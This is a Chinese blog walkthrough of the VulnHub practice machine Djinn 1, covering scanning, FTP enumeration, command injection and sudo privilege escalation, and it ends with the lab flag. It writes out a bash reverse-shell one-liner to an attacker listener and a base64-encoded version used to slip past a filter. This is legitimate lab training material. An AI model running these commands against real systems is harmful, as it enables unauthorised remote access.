Vulnhub-靶机-Djinn 1

最新推荐文章于 2023-12-18 09:40:21 发布
最新推荐文章于 2023-12-18 09:40:21 发布
阅读量467 收藏
点赞数
分类专栏: Vulnhub-靶机 文章标签: 靶机 渗透测试 网络安全 shell
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_43264813/article/details/113312466
版权

Vulnhub—靶机—Djinn 1

本篇文章仅用于技术交流学习和研究的目的,严禁使用文章中的技术用于非法目的和破坏,否则造成一切后果与发表本文章的作者无关

地址:https://www.vulnhub.com/entry/djinn-1,397/

文章目录

一、信息收集

【步骤一】使用nmap确定目标靶机地址并进行全端口扫描:
【命令】nmap -n -sC -sV -p- 192.168.110.132
在这里插入图片描述

【步骤二】发现开放了21端口ftp服务,进行匿名登录查看:
在这里插入图片描述

【步骤三】将文件下载并查看
【分析】根据文件内容解读在1337端口为设置了一个游戏,能不能拿到最后一个关卡,获得奖励。并且发现了一个疑似用户@nitish81299,去1337端口查看游戏
在这里插入图片描述
在这里插入图片描述

【步骤四】使用python脚本运算
【分析】获得一串数字,1356, 6784, 3409
在这里插入图片描述
【步骤五】使用dirbuster对7331web进行目录枚举,并查看目录内容
在这里插入图片描述
在这里插入图片描述

在这里插入图片描述

二、漏洞利用

【步骤六】在第二个页面发现了隐藏的内容 翻译后没有什么用,在第一个页面告诉我们可以让我们实现所有愿望,那我们尝试让他反弹一个shell
【命令】bash -i >& /dev/tcp/192.168.110.128/1234 0>&1
在这里插入图片描述

【步骤七】发现没有反弹shell,使用bp查看发现被过滤了,使用base64编码
【命令】echo YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjExMC4xMjgvMTIzNCAwPiYx | base64 -d |bash
在这里插入图片描述

【步骤八】进行内网信息收集,查看配置文件passwd及home目录内容
【分析】发现几个用户,在home下发现了疑似nitish的密码,尝试切换用户
在这里插入图片描述
在这里插入图片描述

【步骤九】使用python安装pty,构建交互式shell
【命令】python -c ‘import pty; pty.spawn("/bin/bash")’
在这里插入图片描述

【步骤十】搜索s文件
【命令】find / -perm -u=s -type f -exec ls -l {} ; 2>/dev/null
【分析】发现在nitish用户下有一个sam用户的可执行文件
在这里插入图片描述
【步骤十一】执行该文件
【命令】sudo -u sam genie -cmd whoami
在这里插入图片描述

【步骤十二】提权到sam,查看当前用户可执行的sudo命令
【命令】Sudo -l
在这里插入图片描述
【步骤十三】查看该程序内容
【分析】发现当选择第二项时,值为num时会执行一个bin/sh
在这里插入图片描述

【步骤十四】使用root执行该程序
在这里插入图片描述

【步骤十五】查看flag
在这里插入图片描述

三、Flag

【flag】33eur2wjdmq80z47nyy4fx54bnlg3ibc

夜白君
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
metasploitable2 渗透测试靶机 1
m0_73910867的博客
10-11 1746
Metasploitable2 虚拟系统是一个特别制作的ubuntu操作系统,本身设计作为安全工具测试和演示常见漏洞攻击。这个版本的虚拟系统兼容VMware。当虚拟系统启动之后,使用用户名:msfadmin 和密码msfadmin登陆 适用于学习网络安全
vulnhub靶机 djinn1
witwitwiter的博客
09-10 3636
vulnhub靶机 djinn:1 靶机地址djinn: 1 ~ VulnHub 目标为user.txt和root.txt 靶机配置 将靶机下载好后。在VM中选择打开虚拟机,在开启虚拟机之前,网络设置中调整为nat(与攻击机kali一个网段)。 渗透测试 使用nmap进行扫描 └─# nmap -p- -A -T4 192.168.5.130 Starting Nmap 7.91 ( https://nmap.org ) at 2021-09-10 10:01 CST Nmap scan report f
vulnhub djinn: 1
箭雨镜屋
05-26 607
渗透思路:nmap扫描----匿名登录ftp----gobuster扫描网站目录----利用RCE getshell(payload需要base64编码)----寻找敏感信息切换到用户nitish----sudo切换到sam(善用man命令)----sudo提权到root(使用uncompyle6反编译.pyc)
Vulnhub靶机DJINN_ 1
LainWith的博客
02-03 1698
目录介绍信息收集主机发现主机信息探测测试1337端口测试21端口(ftp)测试7331端口(web)尝试目录扫描命令执行-反弹shell获取第一个Flag提权获取第二个Flag总结参考 介绍 系列:djinn(此系列共3台) 发布日期:2019 年 11 月 18 日 难度:初级-中级 Flag : 2个,普通用户的user.txt和root用户的root.txt 学习: gobuster 目录扫描 ftp 匿名登录 bypass 命令执行漏洞 反弹 shell 的使用 靶机地址:https://www
Vulnhub靶机渗透 -- DJINN: 1
miko's blog
11-03 301
Vulnhub靶机渗透 — DJINN: 1 0x00 前言: 介系一个及其简单的靶机 非常适合新玩家对她进行渗透 (可以从这里下哦) 啊是的没了,就这些 0x01 信息收集: 进行常规的靶机安装操作后(还是用的VirtualBox),可以发现这台靶机是非常贴心的,已经告诉我们ip了,就不需要我们直接再去扫网段了 简单地用nmap扫描一下能够获得大部分内容 可以发现ssh是被过滤的,我的脑袋瓜啊一下子就想到了knockd,但是重新用sV扫全端口还是不对,要么就是没有这个漏洞,要么就是端口顺序不对 由于
vulnhub-djinn1
KAKA的博客
07-14 444
获取 IP 地址,目标机器已显示: 获取信息:nmap -A -p- 192.168.67.108 得到 4 个端口: 21 --> FTP --> open --> 猜测有文件可获取 22 --> SSH --> filtered --> 猜测为敲门服务[DC 有练过] 1337 --> SOME --> open --> 使用 nc 连接 7331 --> HTTP --> open --> 网页 21 --> FTP
VulnHub系列』djinn: 1-Walkthrough
ins1ght的博客
12-02 1131
靶机发布日期:2019年11月18日,难度:中等。摘要啥的不重要~
vulnhub靶机djinn:1渗透笔记
weixin_52268949的博客
02-16 2051
djinn:1渗透笔记 靶机下载地址:https://www.vulnhub.com/entry/djinn-1,397/ 信息收集 首先我们嘚确保一点,kali机和靶机处于同一网段,查看kali ip地址 当打开这台靶机的时候我们就知道ip地址 由于我们已经确定了靶机的ip所以我们直接扫描开放端口 nmap -A -p- 192.168.20.145 首先我们去访问一下21端口的ftp服务,发现可以匿名登录。根目录有三个txt文本文件我们依次打开查看 creds.txt nitu:81299
Hack djinn:1 : walkthrough【VulnHub靶场】渗透测试实战系列7
重新启程
12-14 907
靶场地址:djinn: 1 靶场介绍: Level: Beginner-Intermediate flags: user.txt and root.txt Description: The machine is VirtualBox as well as VMWare compatible. The DHCP will assign an IP automatically. You'll...
vulnhub靶机-djinn
臭nana的博客
06-27 958
1、找到靶机ip:192.168.0.108
Vulnhub-Djinn靶机-Writeup
Vicl1fe的博客
12-03 1251
个人博客地址 http://www.darkerbox.com 欢迎大家学习交流 靶机网址: https://www.vulnhub.com/entry/djinn-1,397/ 靶机知识点: arp-scan nmap ftp nc dirsearch 命令执行 python2 input漏洞 主机发现 靶机是ova格式的,可以用Vmware导入,也可以用virtualbox打开。 使用...
Vulnhub-djinn2
KAKA的博客
07-15 513
欢迎来到 djinn2 的世界,首先我们得对企业环境些许了解,否则你将无法顺畅地做该练习,在企业中一般都会有备份和邮箱,所以在该练习中,要注意备份和邮箱,一般放置的目录为 /var 目录,除此之外,作者还给我们一个小提示,就是在 5000 端口服务中有 RCE 存在,我们需要利用它,除此之外,介绍一下 MSF 中的 web_delivery 模块,它用于在我们有一定的访问权限,但是没有 shell 的情况下,让咋们开始吧:D nmap -A -p- 192.168.67.33 共开放了 5 个端口,2
靶机测试djinn笔记
qq_56426046的博客
01-13 439
函数将传入来的字符串进行条件判断,如果满足以下条件等于 true 返回并且不会这些下面语句。翻译 哦,我忘了告诉你我在 1337 号港口为你准备了一个游戏。发现可以不需要密码执行 root 用户下的/root/lago 文件。这是 python flask 框架的 app.py 文件。帮助文档告诉我们可以执行 shell 经过测试均不能执行。通过这份源码 可以判断与 root/lago 文件一样。当 s 等于 num 会这些执行/bin/sh。
djinn vulnhub 靶机渗透过程
mrwangtw的博客
01-19 1949
靶机下载地址:vulnhub官网 下载下来之后,我这边用的是virtualbox,kali攻击机与靶机都设置为net网络。 第一步,靶机扫描,这里打开靶机就能看到 ,靶机地址为10.0.2.43,这一步探测靶机地址可以不做,这里我的kali地址为10.0.2.4 第二步,靶机端口扫描 直接nmap扫描,具体命令就是nmap -sS -p 1-65535 10.0.2.43 第三步,信息的搜集。先进入ftp查看有什么文件线索,这里用anonymous(匿名)方式登录,可以看到三个文件
djinn2 vulnhub 渗透靶机过程
mrwangtw的博客
01-20 2778
这次的靶机感觉挺难的,过程中看了大佬的博客,跟着做了很多次,才完成了提权到root。 靶机扫描 这次的djinn2和djinn1是一样的,打开就可以看到IP地址,我的靶机地址为10.0.2.44,攻击机10.0.2.4. 端口扫描 跟djinn1一样用匿名的方式登录ftp 把三个文件下载下来查看 有用的信息也就第一个,另外的文件没什么可用的信息。 从上面的端口扫描结果发现,开放了ssh,尝试用第一个文件登录发现不可行。 进入 1337端口,结果同djinn1一样,不能用浏览器打开
渗透测试靶机
anquanzushiye的博客
03-20 1197
网站今日更新PPT内容:1.从刑事个案看信息保护与数据利用 https://www.secshi.com/34183.html2.网络空间治理的中国法治...
渗透测试 靶机环境下载
zhyuxue的博客
09-09 1358
下载Linux应用程序虚拟机、Windows下载、metasploit下载。
渗透测试靶机:DC-2
最新发布
m0_70830611的博客
12-18 99
jerry和tom的密码成功爆了出来,对wp-admin进行下登陆。还有个7744端口的ssh可以利用,尝试下这两个用户能否登陆进去。git是以root权限执行的,git也照应了上一个flag的提示。尝试绕过rbash(这里直接借鉴了别人的,但还是不太懂)发现ls能列出home目录,然后还能直接用less查看。得到了三个用户admin、jerry、tom。很明显有个wp-admin的登陆网页。用jerry登陆进去后直接就找到了。jerry没有成功,但tom可以。后面的步骤做的有些云里雾里的。
靶机渗透测试(HA: NARAK)
@小张小张的博客
10-24 2907
靶机渗透测试(HA: NARAK): Vulnhub靶机 HA: NARAK 靶机:修改靶机的网络配置为桥接模式。 攻击机:Kali虚拟机,同样使用桥接模式,即可访问靶机靶机难度:(Easy–Intermediate) 目标:Boot to Root .Your target is gain the Root access 渗透流程: 1. 探测靶机ip地址(netdiscover -i eth0 -r 网关) 命令: netdiscover -i eth0 -r 192.168.10.0
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

夜白君

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值